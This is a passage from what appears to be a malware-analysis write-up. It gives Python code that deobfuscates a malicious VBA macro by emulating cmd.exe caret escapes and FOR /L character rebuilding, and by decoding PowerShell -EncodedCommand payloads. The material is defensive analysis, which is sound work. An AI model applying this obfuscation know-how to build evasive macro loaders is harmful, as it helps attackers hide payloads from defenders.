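    rebuilt = ''
    while step and ((g >= stop) if step < 0 else (g <= stop)):  # FOR /L bounds are inclusive
        rebuilt += value[g:g + 1]                             # !var:~%G,1! = one char at offset G
        g += step
    return plain, rebuilt[int(call.group(2)):]                # %var:~-N% = last N characters

def decode_powershell(payload):
    """'-e <b64>' is PowerShell's -EncodedCommand: base64 of a UTF-16LE script."""
    m = re.search(r'-e(?:ncodedcommand)?\s+([A-Za-z0-9+/=]+)', payload, re.I)
    return base64.b64decode(m.group(1)).decode('utf-16-le') if m else None

def deobfuscate(vba_src):
    assigns, run_args = parse_vba(vba_src)
    if run_args is None:
        raise ValueError('no WScript.Shell .Run call found')
    cmdline = eval_expr(run_args, assigns)
    plain, payload = decode_cmd(cmdline)
    return {'cmdline': cmdline, 'cmd_plain': plain, 'payload': payload,
            'powershell': decode_powershell(payload)}

if __name__ == '__main__':
    print(deobfuscate(SAMPLE_VBA))
```

deobfuscate() returns the raw assembled command line (carets intact), the caret-stripped cmd.exe command, the string the FOR /L loop rebuilds, and the decoded PowerShell text. Two details matter for correctness: cmd.exe strips the outer quotes of the /C argument before parsing, which is why the carets inside the quoted block are still escapes and can simply be dropped, and the FOR /L emulation must honour the inclusive bounds and the negative step, otherwise the first or last character of the payload is lost.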